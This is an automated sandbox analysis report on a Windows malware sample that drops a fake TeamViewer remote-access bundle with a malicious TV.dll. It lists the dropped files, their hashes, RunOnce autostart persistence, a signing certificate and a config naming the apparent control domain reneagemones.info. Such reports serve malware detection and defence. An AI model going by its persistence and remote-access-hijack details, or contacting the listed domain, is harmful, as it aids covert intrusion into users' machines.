                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • HDC enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal80.evad.winEXE@22/12@4/4
                                                                                                                                    EGA Information:Failed
                                                                                                                                    HDC Information:
                                                                                                                                    • Successful, ratio: 15.5% (good quality ratio 14.9%)
                                                                                                                                    • Quality average: 83.7%
                                                                                                                                    • Quality standard deviation: 24.8%
                                                                                                                                    HCA Information:Failed
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Adjust boot time
                                                                                                                                    • Enable AMSI
                                                                                                                                    Warnings:
                                                                                                                                    Show All
                                                                                                                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe
                                                                                                                                    • TCP Packets have been reduced to 100
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 92.122.145.220, 23.35.236.56, 93.184.220.29, 20.82.210.154, 40.112.88.60, 23.216.77.209, 23.216.77.208, 20.50.102.62
                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, cs9.wac.phicdn.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, store-images.s-microsoft.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

                                                                                                                                    TimeTypeDescription
                                                                                                                                    13:51:11API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                    13:51:17API Interceptor39x Sleep call for process: TeamViewer.exe modified
                                                                                                                                    13:51:26AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe" f
                                                                                                                                    13:51:34AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe" f
                                                                                                                                    13:52:30API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs

                                                                                                                                    No context

                                                                                                                                    Domains

                                                                                                                                    No context

                                                                                                                                    ASN

                                                                                                                                    No context

                                                                                                                                    JA3 Fingerprints

                                                                                                                                    No context

                                                                                                                                    Dropped Files

                                                                                                                                    No context

                                                                                                                                    Created / dropped Files

                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):4096
                                                                                                                                    Entropy (8bit):0.5911798908653279
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6:0FTTek1GaD0JOCEfMuaaD0JOCEfMKQmDwg/tAl/gz2cE0fMbhEZolrRSQ2hyYIIT:0fGaD0JcaaD0JwQQVtAg/0bjSQJ
                                                                                                                                    MD5:4CB285EEFF119D1DFD0BC97E94936906
                                                                                                                                    SHA1:A7EA66C77EF4E8563579DF5AC2728AE57DD66F22
                                                                                                                                    SHA-256:737CE3AFFB100886870E7B2FFE3652436A7B98FF9C555A27B6F3103D48C98ACA
                                                                                                                                    SHA-512:30D669F598A628899402EB430D14A4E6B2CBFAA4B3ECE940FB2BE62C90FDE3D56160472DF53071EB5EEF892464FE622F6251D67ADD45244784AC27E1F10D19F3
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview: ......:{..(......3...y7.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................3...y7...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x87a573cd, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):32768
                                                                                                                                    Entropy (8bit):0.0947638796172184
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6:GAGzwl/+sRIE11Y8TRXQWsH3MqKEAGzwl/+sRIE11Y8TRXQWsH3MqK:BG0+sO4blDsXHKTG0+sO4blDsXHK
                                                                                                                                    MD5:10044699896FCD83E6D2AACF7AD018CC
                                                                                                                                    SHA1:979085BC69FF906EB595D3B29B220897323B645A
                                                                                                                                    SHA-256:CFFBDCB3DE8A841FCAFBBC46D4C4D5CC7A3F9AE642560A02E0EAB93955D76165
                                                                                                                                    SHA-512:B8DEBCF36622C6EBA95262EB3B33E1211D715C7FB99074B9A3F9BD8ED22D11E7A67E3D371A30B6C5AC8B6485A33B0DA18A6AD96D4179D3C304A934A8F5D9743A
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview: ..s.... ................e.f.3...w........................&..........w...3...y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................x....3...y....................^..3...y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):8192
                                                                                                                                    Entropy (8bit):0.10821565386287257
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:Vq/7Evpjwkl+Al/bJdAtiJM///all:s/itl+At4SMG
                                                                                                                                    MD5:CA6DBB540336CC98DD443DEEE720D3A0
                                                                                                                                    SHA1:5043896148059D34A2CDC487DE4B6A8B67EE37EA
                                                                                                                                    SHA-256:1DA6B97F07296A4ECCA7F59CD7B4D9259E620609470AFC85436843439B8AAB9F
                                                                                                                                    SHA-512:8BB631F3AE6E8E3B6F25274A11DA69E1D851912A5C997B493DA37F15B9768031EEC2BC49A07CBB7078FC03B0BB5CE20546733862258035E8C2A0D9A98AF22632
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview: .(X.....................................3...w...3...y.......w...............w.......w....:O.....w....................^..3...y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    C:\Users\user\AppData\Local\Temp\nsa6985.tmp
                                                                                                                                    Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):5132919
                                                                                                                                    Entropy (8bit):6.737705896318464
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:98304:FjdgHPmMogx1WZRkPapqj+ZG/D+AKbS5ZmfzCAW6LcTjH:tqHuMogsRkyq0umfzCgi
                                                                                                                                    MD5:E29F152B606F9669680D7CB24308991A
                                                                                                                                    SHA1:680CC154C050B90FEA35AD0FDB97E387D62B7740
                                                                                                                                    SHA-256:FF1A9205BD8076DE3811E5417AC2AEAC44D940F392B19C9D8A2833493CC8034F
                                                                                                                                    SHA-512:C33DB997837A716A0F09E0E40C61D92BADFAF2A440C8EBB5BAB9F156A2CC61E91DBF7CC748D074F7743E336F93080D4BDABBC14483A23036EC68C9DDEDC40DF5
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview: ........,.......,.......D.......$.......w...................................................................................................................................................................................................................................................................C...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    C:\Users\user\AppData\Roaming\TeamViewer\TV.dll
                                                                                                                                    Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):75256
                                                                                                                                    Entropy (8bit):6.743019659267088
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:coaayOa9Z58qTGIT0XhZKfl2MjEzHPggfLD//qQmoz:p1uZ58qTGITey4zJfLD3qQmC
                                                                                                                                    MD5:A44F2649C82B35D42E6036D1C75E48C4
                                                                                                                                    SHA1:EE3B00701C97ED107B78ECBDF9D962F1508EDC8E
                                                                                                                                    SHA-256:760945429F7EA52C40C75A0FA0424D943E317EC48575C812545CC2C4BE5B0510
                                                                                                                                    SHA-512:B8340F06E3446AA91F435F4009557830BBC8E8279321F41198C076E8202869B98C156809CF3FAD8F900B569ACA2AB6B6A7725A1532E2846B31EDEC513E84734D
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 27%
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.l5...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...fRich...f................PE..L.....;a...........!.........H...............................................@......v.....@......................... ...V.......@.......L................%... ..$.......................................................t............................text............................... ..`.rdata..v+.......,..................@..@.data...x...........................@....rsrc...L...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                    C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):4375848
                                                                                                                                    Entropy (8bit):6.621789733656387
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:98304:6jdgHPmMogx1WZRkPapqj+ZG/D+AKbS5m:4qHuMogsRkyq0N
                                                                                                                                    MD5:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                                    SHA1:A3A7498F02BAB188B3944382BBA4D016D63607D1
                                                                                                                                    SHA-256:D2CDCA8EFA27089D3DEAD0CCEAFBE470B3815C9C2A362C007D1F516E5379AC92
                                                                                                                                    SHA-512:412B42C540A9FE41709453D725B7A1E888849326A70A411E645F29240D730D69EBCF4B26E6870D33E0A395C612470BD00064025D22B0C6BCD211242E8EF6CEA6
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............o...o...o.......o.......o.....2.o.....q.o.F.2...o...n...o.......o.F.0...o.......o.......o.......o.Rich..o.................PE..L.....LK..................3.........F........03...@...........................K......ZC.......................................@...... K.8`............B.(...........pe4......................x:.....`x:.@............03. ............................text.....3.......3................. ..`.rdata..&....03.......3.............@..@.data...h....P@.."...*@.............@....tls..........K......LB.............@....rsrc...8`... K..b...NB.............@..@........................................................................................................................................................................................................................................................................................................
                                                                                                                                    C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.ini
                                                                                                                                    Process:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:modified
                                                                                                                                    Size (bytes):2372
                                                                                                                                    Entropy (8bit):3.112142379658329
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:ztYv+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+9+S:9
                                                                                                                                    MD5:3A763054AEBA6DD14BFFC07A9668E0A9
                                                                                                                                    SHA1:ABA2EB735B1F9375BBC3CEFC9E44797E6448A4C4
                                                                                                                                    SHA-256:F8C4590C3B29AEBCE5530ECB5C1E59CAD18E50651310ECF2331ECBCDF6BC922C
                                                                                                                                    SHA-512:713486A3B8FD75587E097F11EE49E631C822743094A4AE34D957E1C1DACF656F0F2650B80B55F10510215632B2992B4CC5F43ACEF23CE7659EB19C74489EEE3E
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview: r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o.....h.p.n.=./.u.p.d.a.t.e./.....h.s.n.=.1.....h.t.=.6...../.B.8.C.6.3.1.A.8./.....h.s.n.=.1.....h.t.=.6.....1.3.6.....r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.
                                                                                                                                    C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll
                                                                                                                                    Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):607528
                                                                                                                                    Entropy (8bit):6.564133582926054
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6144:r5hmfFy7ZJ0uUCAD06v7JlHZctms+2lifZ0iMe8d6YySkYQKMDqtAu3NhgGy6wSP:Vhmf4ACAzneosEi6YhvAuUGyUrNJbL
                                                                                                                                    MD5:554EE592B125CFDF81B376B5C24AA61C
                                                                                                                                    SHA1:666D2C04171246734575D4453289AA2D9AF93B97
                                                                                                                                    SHA-256:B296EF421D5B7F569E623D41A42D87A064C4358CFA89A192988F854929E3ABD1
                                                                                                                                    SHA-512:6C3111BF9D26929D426797EBDD8D804B34E2E8F593BF488298E70964538F2DA3D971C4ED3C3237C829AE7DE4FDB8D4316D84F153E93E3788808547A8538B73F5
                                                                                                                                    Malicious:false
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-T.L:..L:..L:...F..L:...B..L:.Rich.L:.........PE..L.....LK...........!.........................................................0.......................................................................0..(.... .......................................................................................rsrc...............................@..@.reloc....... ....... ..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    C:\Users\user\AppData\Roaming\TeamViewer\vpn.cab
                                                                                                                                    Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                                    File Type:Microsoft Cabinet archive data, 71196 bytes, 8 files
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):71196
                                                                                                                                    Entropy (8bit):7.996182851828797
                                                                                                                                    Encrypted:true
                                                                                                                                    SSDEEP:1536:qUTRtkxXFuG1DKNYCqRBiFxMZPQCJh/njgG5+jC5hA101pNO0:qUNtax12mCqRBiyQG/jgG5+j2NO0
                                                                                                                                    MD5:8A84AA1B9F20DC194947D7AC592D818E
                                                                                                                                    SHA1:4A77AB0D59F39BF600BB89D9121446F6AA2D139B
                                                                                                                                    SHA-256:8A740BE5D92B734E77B210354988DFD49F31C49814240513CF4B0353A8CE6DFB
                                                                                                                                    SHA-512:B3F90ADB48861CD775F15E75885C81A130D62DFE429A5833FA1CE0BC203EEA15BD8A7306618B1F4D27810493300400C8B149D58032F90F0E9D93B04F9B8F1050
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview: MSCF............,...............JA..H........)........k<'b..64\teamviewervpn.cat......)....k<'b..64\TeamViewerVPN.inf.(....>....k<'b..64\teamviewervpn.sys..<........k<&b..64\install.exe..)........k<'b..86\teamviewervpn.cat......-....k<'b..86\TeamViewerVPN.inf..b...B....k<'b..86\teamviewervpn.sys...........k<&b..86\install.exe.h.t"X<..[.....`.....@...N.f.|..U.......$."..L.F..4....|....U$Q/...%.J).D...@F.......f...9..../@.x;.N..w..2...i1P.....O.....T...T.y...``...;.$.&....@........@..~..\...J.44...:.@....M.....x\.0c|..W...,.|.x..+.P..N.. ..S0@B.;?.(..B..,.%.{.. ....(T.....U.5..=.3'rxci.;....P$..H)...1...h._e..{....Q._..}...K......U.s...._..WRWlS.8.._...D.NI..>.|O<..q...$0.EA*8d...../..=@2q...g_.Hs|`+...`.>U..)X.G*.8.....>..!4 ....}..Ps.a.8.......4.0`._t%...P.qgr..'..~.d..r.....o...w..q........,O.K..Y.8..M.D...p........~.....O?......}@.....>....O..N...c../p..[....._=.~.S....Q..p.O...@.WL....*..}..%1...3a.....u...)..K.Y...s..E;...".e.....X0(IR..'..1...\..6...(i
                                                                                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):55
                                                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:modified
                                                                                                                                    Size (bytes):906
                                                                                                                                    Entropy (8bit):3.14662995254944
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:58KRBubdpkoF1AG3rlsQlw3IHe0k9+MlWlLehB4yAq7ejCEsQlw3IHy:OaqdmuF3rlp+T3+kWReH4yJ7MNp+B
                                                                                                                                    MD5:0EAC1BAA62604D45C05D6FD1407B4089
                                                                                                                                    SHA1:2D25DA7AFE0015AE800B53C76B6A4C7D61C4002B
                                                                                                                                    SHA-256:EDD329DE78C018022DD968702A2EEABE7D4C215302AB63798FFA681A02999351
                                                                                                                                    SHA-512:3CF1D73352067BD3F848CC46D3A57E0315AAA20342ACAE432CC481CF2B78FF7F7DFCE5D0C8D25FFF410A507AA6F99FB2CA28CFA7DAE95B9E6DB0982F555ACE7B
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:unknown
                                                                                                                                    Preview: ........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. S.e.p. .. 1.5. .. 2.0.2.1. .1.3.:.5.2.:.2.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. W.e.d. .. S.e.p. .. 1.5. .. 2.0.2.1. .1.3.:.5.2.:.3.0.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                                                                    Static File Info

                                                                                                                                    General

                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                    Entropy (8bit):7.973639636653341
                                                                                                                                    TrID:
                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                                                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                    File name:77Etc0bR2v.exe
                                                                                                                                    File size:1828192
                                                                                                                                    MD5:e71e3b995477081569ed357e4d403666
                                                                                                                                    SHA1:809c4cc4ae51fcf3eca24e7d7fa5c1b6b5db52ce
                                                                                                                                    SHA256:94b9abbe10bd9d6abcb8dce27814992bf7a09ed416c66998bd3496bda1490713
                                                                                                                                    SHA512:2dca79011e40164672f7d81ed42fa9f080bca7148e451a0bf94c6bf0f6381e6eb8ee1bc3bac14e690304410a43f46994bfae76ee7d8ee2785ffaecb02f9ebd3b
                                                                                                                                    SSDEEP:49152:OBGHLrZP7auvm8sJEkbxH0ulBuw8ZtTUZEoH+hE:vrdTauvkERulBaUZEoH+h
                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L.....*J.................\.........

                                                                                                                                    File Icon

                                                                                                                                    Icon Hash:c403939c989380c8

                                                                                                                                    Static PE Info

                                                                                                                                    General

                                                                                                                                    Entrypoint:0x40323c
                                                                                                                                    Entrypoint Section:.text
                                                                                                                                    Digitally signed:true
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    Subsystem:windows gui
                                                                                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                    Time Stamp:0x4A2AE2A2 [Sat Jun 6 21:41:54 2009 UTC]
                                                                                                                                    TLS Callbacks:
                                                                                                                                    CLR (.Net) Version:
                                                                                                                                    OS Version Major:4
                                                                                                                                    OS Version Minor:0
                                                                                                                                    File Version Major:4
                                                                                                                                    File Version Minor:0
                                                                                                                                    Subsystem Version Major:4
                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                    Import Hash:5bd07784f328e868356a895d4ab1a505

                                                                                                                                    Authenticode Signature

                                                                                                                                    Signature Valid:true
                                                                                                                                    Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                                    Signature Validation Error:The operation completed successfully
                                                                                                                                    Error Number:0
                                                                                                                                    Not Before, Not After
                                                                                                                                    • 6/3/2021 5:00:00 PM 6/4/2022 4:59:59 PM
                                                                                                                                    Subject Chain
                                                                                                                                    • CN=Hartex LLC, O=Hartex LLC, L=Moscow, C=RU
                                                                                                                                    Version:3
                                                                                                                                    Thumbprint MD5:5D5CA7E8D78224799E8AA101FF486137
                                                                                                                                    Thumbprint SHA-1:319517761E92EC6EEF1966A5994570D46A498093
                                                                                                                                    Thumbprint SHA-256:AC50A5D91A71BA8447EE795FF966E625AEC004E49EB24ADAA366B988686B65A5
                                                                                                                                    Serial:009B576882CCDB891FD6E4A66671F3AC71

                                                                                                                                    Entrypoint Preview

                                                                                                                                    Instruction
                                                                                                                                    sub esp, 00000180h
                                                                                                                                    push ebx
                                                                                                                                    push ebp
                                                                                                                                    push esi
                                                                                                                                    xor ebx, ebx
                                                                                                                                    push edi
                                                                                                                                    mov dword ptr [esp+18h], ebx
                                                                                                                                    mov dword ptr [esp+10h], 00409130h
                                                                                                                                    xor esi, esi
                                                                                                                                    mov byte ptr [esp+14h], 00000020h
                                                                                                                                    call dword ptr [00407030h]
                                                                                                                                    push 00008001h
                                                                                                                                    call dword ptr [004070B4h]
                                                                                                                                    push ebx
                                                                                                                                    call dword ptr [0040727Ch]
                                                                                                                                    push 00000008h
                                                                                                                                    mov dword ptr [00423F58h], eax
                                                                                                                                    call 00007F586D1BE7BEh
                                                                                                                                    mov dword ptr [00423EA4h], eax
                                                                                                                                    push ebx
                                                                                                                                    lea eax, dword ptr [esp+34h]
                                                                                                                                    push 00000160h
                                                                                                                                    push eax
                                                                                                                                    push ebx
                                                                                                                                    push 0041F458h
                                                                                                                                    call dword ptr [00407158h]
                                                                                                                                    push 004091B8h
                                                                                                                                    push 004236A0h
                                                                                                                                    call 00007F586D1BE471h
                                                                                                                                    call dword ptr [004070B0h]
                                                                                                                                    mov edi, 00429000h
                                                                                                                                    push eax
                                                                                                                                    push edi
                                                                                                                                    call 00007F586D1BE45Fh
                                                                                                                                    push ebx
                                                                                                                                    call dword ptr [0040710Ch]
                                                                                                                                    cmp byte ptr [00429000h], 00000022h
                                                                                                                                    mov dword ptr [00423EA0h], eax
                                                                                                                                    mov eax, edi
                                                                                                                                    jne 00007F586D1BBBBCh
                                                                                                                                    mov byte ptr [esp+14h], 00000022h
                                                                                                                                    mov eax, 00429001h
                                                                                                                                    push dword ptr [esp+14h]
                                                                                                                                    push eax
                                                                                                                                    call 00007F586D1BDF52h
                                                                                                                                    push eax
                                                                                                                                    call dword ptr [0040721Ch]
                                                                                                                                    mov dword ptr [esp+1Ch], eax
                                                                                                                                    jmp 00007F586D1BBC15h
                                                                                                                                    cmp cl, 00000020h
                                                                                                                                    jne 00007F586D1BBBB8h
                                                                                                                                    inc eax
                                                                                                                                    cmp byte ptr [eax], 00000020h
                                                                                                                                    je 00007F586D1BBBACh
                                                                                                                                    cmp byte ptr [eax], 00000022h
                                                                                                                                    mov byte ptr [eax+eax+00h], 00000000h

                                                                                                                                    Rich Headers

                                                                                                                                    Programming Language:
                                                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                    Data Directories

                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x440000xd628.rsrc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x1bbf680x25f8
